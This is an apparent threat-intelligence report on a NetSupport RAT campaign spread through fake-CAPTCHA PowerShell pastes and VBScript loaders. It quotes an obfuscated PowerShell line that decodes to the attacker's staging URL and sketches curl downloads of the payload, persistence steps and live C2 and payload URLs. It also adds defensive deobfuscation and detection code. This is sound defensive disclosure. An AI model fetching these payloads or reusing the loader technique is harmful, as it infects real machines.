Signed, Sealed, Delivered: How a Legitimately-Signed NetSupport Binary Became a Weapon Across 333+ ClickFix Infections
TL;DR: A legitimately signed NetSupport Manager v14.12 binary -- bearing a valid GlobalSign EV code-signing certificate issued to NETSUPPORT LTD -- is being weaponized as a Remote Access Trojan across two active delivery chains. The first chain uses fake Cloudflare Turnstile CAPTCHA pages to trick victims into pasting PowerShell commands, pulling the RAT payload from a GitHub account with 333+ confirmed downloads. The second chain uses VBScript and JavaScript loaders to deploy the same binary via Cloudflare Tunnels, connecting to a C2 gateway at mulenial.info on Russian-operated infrastructure. Both chains share operational fingerprints -- a consistent 7z password (-pppp), common file naming conventions, and Russian registrar clustering -- pointing to a single MaaS operation with multiple delivery affiliates.
The Trust Problem: When the Signature Is Real
This investigation began with a file that most security tools would pass without a second look. Service.exe (SHA256: 56ebaf89...) is a genuine NetSupport Manager v14.12 client binary, compiled on 2025-07-03 and signed nine days later with a valid GlobalSign Extended Validation certificate issued to NETSUPPORT LTD. The certificate chain is clean. The signature is timestamped. The PDB path (E:\nsmsrc\nsm\1412\1412\client32\release_unicode\client32.pdb) is consistent with NetSupport's internal build process. Nothing about the binary itself is malicious.
That is the entire point.
The .text section of Service.exe is 194 bytes -- a stub whose sole purpose is to load PCICL32.dll and invoke _NSMClient32@8. All remote access capability lives in companion DLLs deployed alongside the binary. The C2 destination is stored in a separate client32.ini file. This means the attacker ships a perfectly legitimate, validly signed executable that most enterprise AV/EDR solutions will deprioritize or skip entirely, and controls its behavior through external configuration files that have no signature at all.
As of 2026-03-15, the binary sits at 15/76 detections on VirusTotal. More than 80% of security engines see a signed NetSupport binary and move on.
Delivery Chain A: Fake Cloudflare Turnstile and a GitHub Release Page
The first delivery chain exploits the ClickFix social engineering technique -- a pattern that has gained significant traction since late 2024. Victims land on pages that impersonate Cloudflare Turnstile or reCAPTCHA verification prompts. The pages instruct the user to "verify" by opening the Windows Run dialog (Win+R), pasting a PowerShell command from the clipboard, and executing it. The lure pages are hosted across a cluster of recently registered domains:
| Domain | IP | Registered | Purpose |
|---|---|---|---|
| lubazra.com | 185.82.217.17 | 2026-02-26 | ClickFix landing page |
| cloflart.com | 87.120.93.69 | 2026-02-25 | RAT package staging |
| sasndfsdfghjasd.run | 172.67.140.168 | 2026-02-24 | Redirect chain |
| winecdn.sbs | 178.16.52.101 | 2026-03-13 | JavaScript injector |
All four domains were registered via NICENIC International Group within a 17-day window. Two of them use ERANS.RU nameservers. This registrar clustering is the campaign's most significant OPSEC failure, and we will return to it.
The PowerShell Dropper
When the victim pastes and executes the clipboard payload, a PowerShell dropper (gosidefastandpure_netsupport_dropper.ps1) executes the following sequence:
- Pre-install beacon: `GET https://gosidefastandpure.com/{id}/started/{token}` -- notifies the operator that the dropper is executing on a live victim.
- Payload download: Fetches `mw--58389c35-c76b-46ac-b33e-7efe83b65fda.zip` from a GitHub Releases page under the account `4realgg`, repository `Helper-Update1.0`.
- Extraction and execution: Unpacks the ZIP to `%LOCALAPPDATA%\{GUID}\` and launches `client32.exe`.
- Persistence: Creates `WinAuthenticate.lnk` in the Startup folder.
- Post-install beacon: `GET https://gosidefastandpure.com/{id}/completed/{token}` -- confirms successful RAT deployment.
The GitHub release page is still live. As of 2026-03-15, the download counter reads 333. That number represents a minimum bound on successful infections from this single delivery vector alone. The real count is likely higher -- some victims may download the ZIP but fail to execute it, and the counter does not account for payloads served from other staging infrastructure such as cloflart.com/at.7z.
The Tracker: gosidefastandpure.com
The victim tracking server at 194.180.191.239 (MivoCloud SRL, Moldova) runs nginx/1.22.1 fronting a Python Waitress backend. It serves two purposes: confirming that the PowerShell dropper has started executing, and confirming that the RAT has been successfully installed. The two-beacon pattern gives the operator real-time visibility into the conversion rate between "dropper executed" and "RAT deployed" -- operational metrics for a malware delivery business.
The domain was registered on 2026-02-10 via NICENIC, the same registrar used for the ClickFix landing pages. The server also hosts gosidefastandpure.com on ports 80, 443, and 8080.
Delivery Chain B: VBScript Loaders and Cloudflare Tunnels
The second delivery chain is less flashy but equally effective. It uses VBScript (loader.vbs), JavaScript (MARCELO-PDF.js), and PowerShell (scam.ps1) loaders distributed through phishing lures themed around PDFs, Zillow real estate listings, and XRP cryptocurrency.
The kill chain follows a familiar pattern:
```
DELIVERY
  Victim receives phishing lure → executes loader.vbs or loader.js
    ↓
DOWNLOAD
  curl downloads Build.zip from:
    - Cloudflare Tunnel: challenges-natural-infinite-camera.trycloudflare.com/Build.zip
    - Direct staging:    http://89.185.80.76/Build.zip
    ↓
DEPLOY
  tar -xf Build.zip → drops to %APPDATA%\Roaming\Build\
  Deletes the ZIP archive
    ↓
PERSIST
  Registry: HKCU\...\Run\Update → path to Service.exe
  OR: LNK in Startup folder
    ↓
C2
  Service.exe → loads PCICL32.DLL → reads client32.ini
    → TCP 443 to mulenial.info (178.130.47.196)
    → beacon: GET /fakeurl.htm
```
One variant uses char-array obfuscation in PowerShell to hide the staging URL:
```powershell
$url = -join (104,116,116,112,58,47,47,56,57,46,49,56,53,46,56,48,46,55,54,47,66,
117,105,108,100,46,122,105,112 | % {[char]$_})
# Decodes to: http://89.185.80.76/Build.zip
```
This is trivially reversible. The obfuscation exists solely to defeat static signature matching on the plaintext URL.
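For analysts triaging loader samples, the reversal can be automated. The following is an added example, not code from the report: it finds every `-join (... | % {[char]$_})` expression in a PowerShell script, even when the code-point list wraps across lines as in the snippet above, and rewrites each one as a plain string literal. The sample script is constructed from the report's snippet plus a second, shorter obfuscated string.

```python
import re

# The loader idiom quoted in the report: a comma-separated list of code points
# piped through [char] and joined. The list may wrap across lines, so the
# pattern allows whitespace (including newlines) around every comma.
CHAR_ARRAY_JOIN = re.compile(
    r"-join\s*\(\s*((?:\d+\s*,\s*)+\d+)\s*\|\s*(?:%|ForEach-Object)\s*"
    r"\{\s*\[char\]\s*\$_\s*\}\s*\)",
    re.IGNORECASE,
)

def decode_char_array(csv_ints: str) -> str:
    """Turn '104,116,...' (possibly spanning lines) into the string it encodes."""
    return "".join(chr(int(n.strip())) for n in csv_ints.split(","))

def deobfuscate(script: str) -> tuple[str, list[str]]:
    """Replace each char-array join with a single-quoted PowerShell literal.
    Returns the rewritten script and every string that was recovered."""
    recovered: list[str] = []

    def replace(match: re.Match) -> str:
        text = decode_char_array(match.group(1))
        recovered.append(text)
        return "'" + text.replace("'", "''") + "'"   # PowerShell single-quote escaping

    return CHAR_ARRAY_JOIN.sub(replace, script), recovered

def recovered_urls(script: str) -> list[str]:
    """Convenience wrapper: only the http(s) URLs hidden in the script."""
    _, strings = deobfuscate(script)
    return [s for s in strings if re.match(r"https?://", s, re.IGNORECASE)]

# Constructed sample: the exact snippet quoted in the report, followed by a
# second obfuscated string (the file name 'Build.zip') to exercise multi-match.
SAMPLE_SCRIPT = """\
$url = -join (104,116,116,112,58,47,47,56,57,46,49,56,53,46,56,48,46,55,54,47,66,
117,105,108,100,46,122,105,112 | % {[char]$_})
$out = -join (66,117,105,108,100,46,122,105,112 | ForEach-Object {[char]$_})
"""

if __name__ == "__main__":
    cleaned, strings = deobfuscate(SAMPLE_SCRIPT)
    print(cleaned)
    print("recovered:", strings)
```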
The Build.zip Package
The ZIP contains the full NetSupport Manager runtime -- 14 files including the signed Service.exe, the core engine DLL (PCICL32.DLL), audio capture capabilities (AudioCapture.dll), a remote command shell stub (remcmdstub.exe), a keyboard filter driver INF (nskbfltr.inf), and the critical client32.ini configuration file that points to the attacker's C2 gateway. Everything the operator needs for full remote desktop control, file transfer, shell access, audio surveillance, and clipboard monitoring -- all running under the cover of a legitimately signed binary.
Infrastructure: Same ASN, Same Actor
The most damning piece of infrastructure analysis in this investigation is the relationship between the C2 and staging servers in Chain B.
C2 Gateway: 178.130.47.196
| Field | Value |
|---|---|
| IP | 178.130.47.196 |
| ASN | AS215540 -- Global Connectivity Solutions LLP |
| Location | Frankfurt am Main, Germany |
| OS | Windows Server 2022 (Build 10.0.20348) |
| Machine Name | VM-d02119f6-3aa6-49ae-9f8f-1d094d6590a4 |
| Open Ports | 2222/tcp (SSH), 3389/tcp (RDP), 3478/udp (STUN) |
| VT Reputation | 0 (not yet flagged) |
| DNS | mulenial.info (ns1/ns2.erans.ru) |
| Domain Registered | 2026-03-03 |
Staging Server: 89.185.80.76
| Field | Value |
|---|---|
| IP | 89.185.80.76 |
| ASN | AS215540 -- Global Connectivity Solutions LLP |
| Location | Phoenix, US |
| OS | Windows 11 (21H2 / 10.0.22000) |
| Machine Name | DESKTOP-2NFCDE2 |
| Open Ports | 135/tcp (RPC), 445/tcp (SMB), 3389/tcp (RDP) |
| VT Malicious | 2 |
Both servers sit on AS215540. The staging server's machine name -- DESKTOP-2NFCDE2 -- is a default Windows workstation hostname, not a server naming convention. This is either the operator's workstation doubling as a staging server, or a hastily provisioned VPS that was never renamed. Either way, a single actor controls the full delivery-to-C2 pipeline.
The C2 domain mulenial.info was registered twelve days before the first VBScript loader was submitted to VirusTotal. It uses ERANS.RU nameservers -- the same Russian nameserver infrastructure used by cloflart.com in Chain A. This is the thread that ties both delivery chains to the same operator.
OPSEC Failures
The operator made several mistakes that allow clustering and tracking of this campaign:
- GitHub delivery exposed: The `4realgg` account and `Helper-Update1.0` repository remain live. The download counter provides a public tally of successful deliveries.
- NICENIC registrar clustering: `gosidefastandpure.com`, `cloflart.com`, and `lubazra.com` were all registered via NICENIC International Group within 16 days (Feb 10--26, 2026). This registrar is not commonly used for legitimate domains and creates a trivial pivoting surface.
- ERANS.RU nameserver reuse: Both `cloflart.com` (Chain A) and `mulenial.info` (Chain B) use ns1/ns2.erans.ru nameservers, linking the two chains to the same operator or MaaS infrastructure provider.
- Shared ASN: C2 and staging on the same AS215540 allocation. No effort to separate delivery from command and control.
- Server hostname leak: The IP behind `cloflart.com` (87.120.93.69) reveals hostname `s241764.love-is.nexus` via Shodan reverse DNS.
- Co-hosted domain: `lubazra.com` (185.82.217.17) also hosts `primeautocenter.com` -- a potential operator personal or business domain worth investigating.
- Unpatched VPS: 45.142.193.27, part of the ClickFix infrastructure, is vulnerable to CVE-2020-0796 (SMBGhost) with WinRM, SMB, and RPC exposed. An operator who does not patch their own infrastructure is an operator who will be found.
- Workstation hostname on staging server: `DESKTOP-2NFCDE2` is not a server name. It is a default Windows desktop hostname that the operator forgot to change.
The C2 Protocol
NetSupport Manager uses a proprietary protocol over TCP. The fakeurl.htm URI is a well-documented beacon path specific to weaponized NetSupport deployments. The client resolves mulenial.info to 178.130.47.196, connects to port 443 over raw TCP -- notably, this is not HTTPS despite using the standard HTTPS port -- and sends GET /fakeurl.htm as a keep-alive beacon. The use of port 443 is a deliberate attempt to blend with legitimate HTTPS traffic at the network flow level, but any deep packet inspection or TLS handshake analysis will immediately reveal the traffic as non-TLS.
All NetSupport clients, including malicious deployments, also call http://geo.netsupportsoftware.com/location/loca.asp for geolocation. This is a built-in feature of the legitimate software and will appear in network logs from both malicious and legitimate installations. Its presence alone is not an indicator of compromise; its presence in combination with client32.ini pointing to non-NetSupport infrastructure is.
The Broader MaaS Cluster
This campaign is not isolated. The delivery infrastructure connects to a wider NetSupport RAT Malware-as-a-Service operation with consistent tradecraft across dozens of campaigns:
| Indicator | Pattern |
|---|---|
| 7z password | -pppp (all archived variants) |
| Delivery filenames | ax.7z, at.7z, lnk.7z |
| Binary naming | Service.exe, neservice.exe, sysinfo.exe, byby.exe |
| Installation folders | Build, Nfservice, RiverNature Horizon |
| Persistence key | HKCU\...\Run\Update |
| Beacon URI | /fakeurl.htm |
Related MaaS nodes include infrastructure tied to Zillow real estate phishing (gologpoint.com, josehpjon.com), XRP cryptocurrency lures (xrpnode.app, validatorxrp.dev), and domains hosted on AS198953 Proton66 OOO, a Russian hosting provider (jakkakaskakasj.com, jasjdpoekkqwda.com). The MARCELO-PDF.js loader filename also suggests targeting of Brazilian Portuguese-speaking victims -- consistent with documented NetSupport RAT campaigns in that region.
MITRE ATT&CK Mapping
| Technique | ID | Campaign Usage |
|---|---|---|
| Phishing: Spearphishing Link | T1566.002 | ClickFix lure pages, PDF/Zillow/XRP phishing links |
| User Execution: Malicious Link | T1204.001 | Victim clicks ClickFix lure URL |
| User Execution: Malicious File | T1204.002 | Victim executes loader.vbs, MARCELO-PDF.js, scam.ps1 |
| Command and Scripting Interpreter: PowerShell | T1059.001 | ClickFix PowerShell dropper, char-array obfuscated loaders |
| Command and Scripting Interpreter: VBScript | T1059.005 | loader.vbs delivery via wscript.exe |
| Ingress Tool Transfer | T1105 | curl/IWR downloads Build.zip from staging |
| Signed Binary Proxy Execution | T1218 | Legitimate NETSUPPORT LTD EV-signed binary |
| Masquerading: Match Legitimate Name | T1036.005 | Binary renamed to Service.exe, sysinfo.exe |
| Deobfuscate/Decode Files or Information | T1140 | Char-array URL obfuscation, ZIP/7z extraction |
| Boot/Logon Autostart: Registry Run Keys | T1547.001 | HKCU...\Run\Update persistence |
| Boot/Logon Autostart: Startup Folder | T1547.001 | LNK in Startup folder |
| Remote Access Software | T1219 | NetSupport Manager used as RAT |
| Application Layer Protocol: Web Protocols | T1071.001 | GET /fakeurl.htm beacon on port 443 |
| Non-Standard Port | T1571 | NetSupport protocol on 443 (non-TLS) and 2081 |
| Screen Capture | T1113 | NetSupport built-in capability |
| Audio Capture | T1123 | AudioCapture.dll |
| Proxy: Domain Fronting | T1090.004 | Cloudflare Tunnels for delivery |
| Exfiltration Over C2 Channel | T1041 | Files and screen data via NetSupport protocol |
Indicators of Compromise
IOCs are provided for defensive use. Handle responsibly.
File Hashes
| SHA-256 | File | Chain |
|---|---|---|
| 56ebaf8922749b9a9a7fa2575f691c53a6170662a8f747faeed11291d475c422 | Service.exe / client32.exe (v14.12) | Both |
| b6d4ad0231941e0637485ac5833e0fdc75db35289b54e70f3858b70d36d04c80 | PCICL32.DLL (core engine) | Both |
| 2f3f5721674bca6bf2b73760e7f925fd10baaf3009a46ba8ccf79ba23bf8a6cc | gosidefastandpure_netsupport_dropper.ps1 | A |
| 517fee961cdd99d528a07bc1c47e07e45bb5b23a3f87d5d4ea10d5dd6e78bd5c | at.7z (RAT package) | A |
| 7c9d85c89949b43ef2fa71da2f2f2c62c25bad72f0ba89f5bf30b6f6ded2c8e8 | lnk.7z (launcher archive) | A |
| 7b751faeacf9fe510b700f33fb7410facff2d487d33a4711e4dbc8c082ba32cf | Build.zip (NetSupport package) | B |
| ff7f999f70b59ded1da165d5bd3889ef3b93a3b03cb16a5cfb70348d82a46adc | client32.ini (C2 config) | B |
| 0f99b1da524e28f9b3e09f877db4b182f9ecf60ce3c0cfb8b18ad6ff4cf996af | loader.vbs | B |
| fb7a84c24d10e1471bc83fcdc887ab7926da55571f7c3c8467b260611bb878d5 | MARCELO-PDF.js | B |
| 15015b739b901b6eb4849a504341068993de5ce324f619dc3f9d1230d3fa5759 | scam.ps1 | B |
| e09980d1b1c508eb29d2931ac92f8d0a7e49ca5fe6ab6277fabf097a0b033b63 | NSM.LIC | B |
Network Indicators -- Chain A (ClickFix/GitHub)
| Type | Indicator | Description |
|---|---|---|
| Domain | gosidefastandpure.com | Victim tracker / C2 beacon |
| IPv4 | 194.180.191.239 | gosidefastandpure.com (MivoCloud, Moldova) |
| Domain | lubazra.com | ClickFix landing page |
| IPv4 | 185.82.217.17 | lubazra.com (Green Floid, Bulgaria) |
| Domain | cloflart.com | RAT staging |
| IPv4 | 87.120.93.69 | cloflart.com (SKYNET, Lithuania) |
| Domain | winecdn.sbs | ClickFix JS injector |
| IPv4 | 178.16.52.101 | winecdn.sbs (dus.net, Germany) |
| Domain | sasndfsdfghjasd.run | Redirect chain |
| Domain | mrllvd.beer | Campaign domain |
| IPv4 | 94.154.35.162 | mrllvd.beer (Railnet, Russia) |
| URL | https://github.com/4realgg/Helper-Update1.0/releases/download/update1/mw--58389c35-c76b-46ac-b33e-7efe83b65fda.zip | Payload ZIP (333+ downloads) |
| URL | https://gosidefastandpure.com/{id}/started/{token} | Pre-install beacon |
| URL | https://gosidefastandpure.com/{id}/completed/{token} | Post-install beacon |
| URL | http://cloflart.com/at.7z | RAT archive |
| URL | https://winecdn.sbs/api/css.js | ClickFix injector JS |
Network Indicators -- Chain B (mulenial.info)
| Type | Indicator | Description |
|---|---|---|
| IPv4 | 178.130.47.196 | C2 gateway (AS215540, Frankfurt) |
| IPv4 | 89.185.80.76 | Staging server (AS215540, Phoenix) |
| Domain | mulenial.info | C2 domain (ns: erans.ru, registered 2026-03-03) |
| URL | http://178.130.47.196:443/fakeurl.htm | C2 beacon |
| URL | https://challenges-natural-infinite-camera.trycloudflare.com/Build.zip | Delivery via CF Tunnel |
| URL | https://choosing-arbitrary-angela-decades.trycloudflare.com/Build.zip | Delivery via CF Tunnel (alt) |
| URL | http://89.185.80.76/Build.zip | Direct staging delivery |
Host Indicators
| Type | Indicator | Description |
|---|---|---|
| Registry | HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update | Persistence key pointing to Service.exe |
| File Path | %APPDATA%\Roaming\Build\Service.exe | Primary deployment path |
| File Path | %APPDATA%\Roaming\Build\client32.ini | C2 configuration file |
| File Path | %APPDATA%\Local\Nfservice\neservice.exe | Alternate deployment path |
| File Path | %PUBLIC%\extraido\Service.exe | PS1 variant deployment path |
| LNK | %APPDATA%\...\Startup\*.lnk | Startup folder persistence |
Related MaaS Infrastructure
| Domain | IP | Role | VT Malicious |
|---|---|---|---|
| jakkakaskakasj.com | 193.143.1.21 | C2 Gateway (Proton66 OOO, RU) | 16 |
| jasjdpoekkqwda.com | 193.143.1.21 | C2 Gateway (Proton66 OOO, RU) | 17 |
| nobovcs.com | 87.120.93.69 | Delivery (same IP as cloflart.com) | 18 |
| srvc-mcrst.com | 152.89.244.70 | C2 Gateway (Frankfurt) | 16 |
| gologpoint.com | 62.164.177.248 | C2 Gateway (Zillow campaign) | 18 |
| xrpnode.app | 212.86.101.32 | Delivery (XRP lure) | 4 |
| validatorxrp.dev | 193.143.1.233 | Delivery (XRP lure) | 9 |
| anodes.pro | (Cloudflare) | Stealc V2 C2 | -- |
| shift-art.com | 37.140.192.197 | Rugmi MSI delivery (REG.RU) | -- |
Detection Recommendations
Endpoint:
- Alert on `Service.exe`, `neservice.exe`, or `client32.exe` executing from `%APPDATA%`, `%LOCALAPPDATA%`, or `%PUBLIC%` paths. Legitimate NetSupport Manager installations reside in `%ProgramFiles%`.
- Monitor for `PCICL32.DLL` loaded by any process outside of standard NetSupport installation directories.
- Flag registry key creation at `HKCU\...\Run\Update` pointing to any executable in user-writable directories.
- Detect PowerShell processes spawned by clipboard paste patterns (Win+R execution) with network callouts to recently registered domains.
Network:
- Inspect outbound TCP connections to port 443 that do not complete a TLS handshake. NetSupport RAT uses its own protocol on port 443 -- the traffic is plaintext HTTP, not HTTPS. This is highly anomalous and straightforward to detect with any protocol-aware firewall or IDS.
- Alert on HTTP requests to `/fakeurl.htm` on any port. This URI is specific to weaponized NetSupport deployments and has no legitimate use.
- Block or alert on connections to `geo.netsupportsoftware.com/location/loca.asp` from hosts that do not have a licensed NetSupport installation.
- Monitor for GitHub Release downloads from unknown or recently created accounts, particularly ZIP files in the 2-5 MB range.
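The two network checks above (non-TLS data on tcp/443, and the `/fakeurl.htm` beacon) plus the caveat from the C2 Protocol section that the geolocation request is informational on its own, as an added detection example that is not part of the original report. It classifies flow records by whether the first client bytes on port 443 form a TLS ClientHello and whether a plaintext request targets the beacon URI; the flow records, the TLS header bytes and the documentation-range addresses are constructed, and only `mulenial.info` / `178.130.47.196` come from the report.

```python
import re
from dataclasses import dataclass

BEACON_URI = "/fakeurl.htm"                 # beacon path named in the report
GEO_HOST = "geo.netsupportsoftware.com"     # built-in check, benign on its own
REQUEST_LINE = re.compile(rb"^(GET|POST|HEAD)\s+(\S+)\s+HTTP/1\.[01]\r?\n", re.I)
HOST_HEADER = re.compile(rb"^Host:\s*([^\r\n]+)", re.I | re.M)

@dataclass(frozen=True)
class Flow:
    """Constructed flow record: destination plus the first bytes the client sent,
    as a sensor or a pcap carve-out would provide them."""
    dst_ip: str
    dst_port: int
    first_bytes: bytes

def is_tls_client_hello(p: bytes) -> bool:
    """TLS record header: content type 0x16 (handshake), major version 0x03,
    2-byte length, then handshake type 0x01 (ClientHello)."""
    return len(p) >= 6 and p[0] == 0x16 and p[1] == 0x03 and p[2] <= 0x04 and p[5] == 0x01

def parse_http_request(p: bytes):
    """Return (uri, host) when the payload starts with a plaintext HTTP request."""
    m = REQUEST_LINE.match(p)
    if not m:
        return None
    h = HOST_HEADER.search(p)
    host = h.group(1).decode(errors="replace").strip().lower() if h else ""
    return m.group(2).decode(errors="replace"), host

def classify(flow: Flow) -> list[str]:
    """Findings for one flow. Entries prefixed 'info:' do not alert by themselves."""
    findings = []
    if flow.dst_port == 443 and not is_tls_client_hello(flow.first_bytes):
        findings.append("non-TLS client data on tcp/443")
    req = parse_http_request(flow.first_bytes)
    if req:
        uri, host = req
        if uri.lower() == BEACON_URI:
            findings.append(f"NetSupport beacon GET {BEACON_URI} to {host or flow.dst_ip}")
        if host == GEO_HOST:
            findings.append("info: NetSupport geolocation check (not malicious alone)")
    return findings

def is_alert(findings: list[str]) -> bool:
    return any(not f.startswith("info:") for f in findings)

# Constructed samples. 178.130.47.196 / mulenial.info are the report's C2; the
# other addresses are RFC 5737 documentation ranges, not real infrastructure.
SAMPLE_FLOWS = [
    Flow("198.51.100.20", 443, bytes.fromhex("160301009a010000960303") + b"\x00" * 32),
    Flow("178.130.47.196", 443, b"GET /fakeurl.htm HTTP/1.1\r\nHost: mulenial.info\r\n\r\n"),
    Flow("203.0.113.10", 80, b"GET /location/loca.asp HTTP/1.1\r\nHost: geo.netsupportsoftware.com\r\n\r\n"),
    Flow("198.51.100.5", 80, b"GET /index.html HTTP/1.1\r\nHost: example.org\r\n\r\n"),
]

def scan(flows=SAMPLE_FLOWS) -> dict[str, list[str]]:
    """Map 'ip:port' to its findings for every flow."""
    return {f"{f.dst_ip}:{f.dst_port}": classify(f) for f in flows}

if __name__ == "__main__":
    for key, findings in scan().items():
        print(key, "ALERT" if is_alert(findings) else "ok", findings)
```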
Infrastructure:
- Block the IOC IP addresses listed above at the perimeter. Both C2 and staging IPs on AS215540 serve no legitimate purpose.
- Monitor DNS for resolutions to domains using ERANS.RU nameservers -- this nameserver infrastructure is heavily associated with malicious registrations in this campaign.
- Consider blocking Cloudflare Tunnel subdomains (`*.trycloudflare.com`) at the proxy level, or at minimum logging and alerting on downloads of ZIP/7z archives through them.
Conclusion
This campaign illustrates a persistent tension in enterprise security: the trust model for code-signed binaries is built on the assumption that a valid signature implies benign intent. NetSupport Manager v14.12 is a legitimate remote administration tool with a legitimate certificate chain. Nothing about the binary has been modified, cracked, or tampered with. The attacker simply deploys it in an unauthorized context with a malicious configuration file, and the signature provides cover against 80% of security engines.
The ClickFix delivery mechanism compounds the problem. By having the victim manually paste and execute a PowerShell command, the attacker bypasses email attachment scanning, browser download warnings, and macro-based execution controls. The initial execution is a user-initiated action from the Run dialog -- a pattern that most endpoint security products will not flag as suspicious until the PowerShell content is analyzed.
The operational fingerprints -- NICENIC registrar clustering, ERANS.RU nameservers, REG.RU domain registration, Proton66 OOO hosting -- place this firmly in the Russian-speaking MaaS ecosystem. The consistent 7z password, file naming conventions, and persistence mechanisms across multiple delivery campaigns suggest a service model where a central operator manages the RAT infrastructure while affiliates handle delivery. With 333 confirmed downloads from a single GitHub release page, multiple active delivery chains, and C2 infrastructure that remains unflagged at a VT reputation of zero, this operation is running and growing.
The infrastructure was entirely live as of 2026-03-15. All IOCs in this report are actionable.
Published 2026-03-15 | BGI Autonomous Threat Hunting | Breakglass Intelligence